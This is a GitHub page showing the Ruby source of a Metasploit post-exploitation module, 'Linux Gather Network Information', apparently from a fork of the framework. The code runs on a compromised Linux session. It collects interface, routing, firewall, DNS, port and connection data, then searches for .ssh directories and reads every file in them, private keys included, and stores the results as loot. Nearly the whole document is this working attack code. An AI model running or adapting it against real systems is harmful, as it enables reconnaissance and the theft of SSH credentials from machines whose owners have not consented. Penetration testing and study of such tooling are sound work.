forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathenum_network.rb
147 lines (122 loc) · 3.74 KB
/
enum_network.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/post/linux/system'
class Metasploit3 < Msf::Post
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather Network Information',
'Description' => %q{
This module gathers network information from the target system
IPTables rules, interfaces, wireless information, open and listening
ports, active network connections, DNS information and SSH information.},
'License' => MSF_LICENSE,
'Author' =>
[
'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
],
'Version' => '$Revision$',
'Platform' => [ 'linux' ],
'SessionTypes' => [ 'shell' ]
))
end
# Run Method for when run command is issued
def run
host = get_host
user = execute("/usr/bin/whoami")
print_status("Module running as #{user}")
# Collect data
distro = get_sysinfo
print_good("Info:")
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
print_status("Collecting data...")
nconfig = execute("/sbin/ifconfig -a")
routes = execute("/sbin/route -e")
iptables = execute("/sbin/iptables -L")
iptables_nat = execute("/sbin/iptables -L -t nat")
iptables_man = execute("/sbin/iptables -L -t mangle")
resolv = cat_file("/etc/resolv.conf")
sshd_conf = cat_file("/etc/ssh/sshd_config")
hosts = cat_file("/etc/hosts")
connections = execute("/usr/bin/lsof -nPi")
wireless = execute("/sbin/iwconfig")
open_ports = execute("/bin/netstat -tulpn")
updown = execute("ls -R /etc/network")
ssh_keys = get_ssh_keys
# Save Enumerated data
save("Network config", nconfig)
save("Route table", routes)
save("Firewall config", iptables + iptables_nat + iptables_man)
save("DNS config", resolv)
save("SSHD config", sshd_conf)
save("Host file", hosts)
save("SSH keys", ssh_keys) unless ssh_keys.empty?
save("Active connections", connections)
save("Wireless information", wireless)
save("Listening ports", open_ports)
save("If-Up/If-Down", updown)
end
# Save enumerated data
def save(msg, data, ctype="text/plain")
ltype = "linux.enum.network"
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_status("#{msg} stored in #{loot.to_s}")
end
# Get host name
def get_host
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = session.shell_command_token("hostname").chomp
end
print_status("Running module against #{host}")
return host
end
def execute(cmd)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd)
return output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
return output
end
def get_ssh_keys
keys = []
#Look for .ssh folder, "~/" might not work everytime
dirs = execute("/usr/bin/find / -maxdepth 3 -name .ssh").split("\n")
ssh_base = ''
dirs.each do |d|
if d =~ /(^\/)(.*)\.ssh$/
ssh_base = d
break
end
end
# We didn't find .ssh :-(
return [] if ssh_base == ''
# List all the files under .ssh/
files = execute("/bin/ls -a #{ssh_base}").chomp.split()
files.each do |k|
next if k =~/^(\.+)$/
this_key = cat_file("#{ssh_base}/#{k}")
keys << this_key
end
return keys
end
end